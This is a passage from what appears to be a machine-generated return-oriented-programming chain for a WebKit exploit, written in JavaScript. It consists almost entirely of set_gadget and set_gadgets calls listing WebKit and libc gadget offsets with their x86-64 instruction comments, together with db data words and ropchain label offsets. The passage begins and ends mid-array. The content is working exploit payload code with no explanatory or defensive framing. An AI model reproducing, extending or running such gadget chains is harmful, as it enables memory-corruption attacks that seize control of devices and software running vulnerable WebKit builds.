webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1069:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1070:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1071:
db([20, 0]); // 0x14
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+107384, //L1072
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+107400, //L1073
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1072:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1073:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+107488, //L1075
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1075:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+107544, //L1076
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1076:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+107616, //L1079
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1079:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+107672, //L1080
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1080:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L1082:
libc_base+763368, //pop rcx
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+107808, //L1083
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1083:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1085:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+107928, //L1088
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+107912, //L1086
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1086:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1088:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+108072, //L1091
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+108040, //L1089
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+108056, //L1090
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1089:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1090:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1091:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+108144, //L1093
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1093:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+108200, //L1094
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1094:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+108296, //L1097
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1096:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1097:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1098:
db([21, 0]); // 0x15
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+108392, //L1099
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+108408, //L1100
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1099:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1100:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+108496, //L1102
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1102:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+108552, //L1103
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1103:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+108624, //L1106
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1106:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+108680, //L1107
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1107:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+108768, //L1109
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1109:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1111:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+108888, //L1114
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+108872, //L1112
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1112:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1114:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+109032, //L1117
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+109000, //L1115
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+109016, //L1116
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1115:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1116:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1117:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+109104, //L1119
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1119:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+109160, //L1120
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1120:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+109256, //L1123
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1122:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1123:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1124:
db([6, 0]); // 0x6
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+109352, //L1125
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+109368, //L1126
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1125:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1126:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+109456, //L1128
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1128:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+109512, //L1129
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1129:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+109616, //L1131
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1131:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1133:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+109736, //L1136
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+109720, //L1134
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1134:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1136:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+109880, //L1139
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+109848, //L1137
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+109864, //L1138
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1137:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1138:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1139:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+109952, //L1141
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1141:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+110008, //L1142
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1142:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+110104, //L1145
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1144:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1145:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1146:
db([22, 0]); // 0x16
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+110200, //L1147
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+110216, //L1148
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1147:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1148:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+110304, //L1150
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1150:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+110360, //L1151
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1151:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+110432, //L1154
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1154:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+110488, //L1155
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1155:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L1157:
libc_base+533450, //mov [rcx], rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+110624, //L1158
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1158:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1160:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+110744, //L1163
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+110728, //L1161
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1161:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1163:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+110888, //L1166
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+110856, //L1164
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+110872, //L1165
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1164:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1165:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1166:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+110960, //L1168
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1168:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+111016, //L1169
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1169:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+111112, //L1172
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1171:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1172:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1173:
db([23, 0]); // 0x17
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+111208, //L1174
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+111224, //L1175
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1174:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1175:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+111312, //L1177
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1177:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+111368, //L1178
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1178:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+111440, //L1181
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1181:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+111496, //L1182
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1182:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L1184:
libc_base+144605, //pop rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+111632, //L1185
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1185:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1187:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+111752, //L1190
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+111736, //L1188
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1188:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1190:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+111896, //L1193
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+111864, //L1191
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+111880, //L1192
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1191:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1192:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1193:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+111968, //L1195
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1195:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+112024, //L1196
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1196:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+112120, //L1199
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1198:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1199:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1200:
db([24, 0]); // 0x18
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+112216, //L1201
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+112232, //L1202
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1201:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1202:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+112320, //L1204
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1204:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+112376, //L1205
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1205:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+112448, //L1208
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1208:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+112504, //L1209
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1209:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+112592, //L1211
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1211:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1213:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+112712, //L1216
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+112696, //L1214
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1214:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1216:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+112856, //L1219
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+112824, //L1217
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+112840, //L1218
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1217:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1218:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1219:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+112928, //L1221
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1221:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+112984, //L1222
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1222:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+113080, //L1225
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1224:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1225:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1226:
db([2, 0]); // 0x2
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+113176, //L1227
